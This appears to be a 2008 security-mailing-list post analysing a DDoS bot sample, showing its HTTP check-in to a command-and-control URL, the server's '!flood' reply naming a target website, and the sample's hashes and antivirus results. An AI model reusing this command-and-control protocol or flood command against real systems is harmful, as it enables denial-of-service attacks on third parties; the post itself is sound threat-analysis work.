[nsp-sec] another ddos bot

[Jose Nazario]

this one looks like IRC-style ddos commands over HTTP:

URL: http://netcoders.ne.funpic.de/b/stat.php

SEND:
POST /b/stat.php HTTP/1.1
Host: netcoders.ne.funpic.de
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 154

nick=zdzwlmrgjlndiha&info=PC: flash1 at OS: Windows XP at Memory: 147/255MB at CPU:3057MHz with 1 core(s)@Uptime: 0 days 0 hours 2 minute at Bot version:1.07@&last=

RECIEVE: HTTP/1.1 200 OK
Set-Cookie: cken=1210250987; path=/; domain=.funpic.de
Date: Thu, 08 May 2008 12:49:47 GMT
Transfer-Encoding: chunked
Connection: close
X-Pad: avoid browser bug
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Keep-Alive: timeout=10, max=1000

38
!flood mass www.battleapps.com 80 /forum/index.php 8 250
0



about that sample:

MD5: 0cec1700336c11a7089d076b1ac43b79
SHA1: 36b57200ecaef36691148e804468d202bb84c628
File type: application/x-ms-dos-executable
File size: 12288 bytes

A/V INFO:
-----------------------------------------------
SCANNER: VScanner                      VIRUS: Unknown, file is 
"suspicious"
SCANNER: AVG                           VIRUS: No virus found.
SCANNER: ClamAV                        VIRUS: No virus found.
SCANNER: BDC                           VIRUS: No virus found.
-----------------------------------------------


i don't thnk i have any more of these in my repo at thi time.

-------------------------------------------------------------
jose nazario, ph.d.     <jose at arbor.net>
security researcher, office of the CTO,  arbor networks
v: (734) 821 1427 	      http://asert.arbornetworks.com/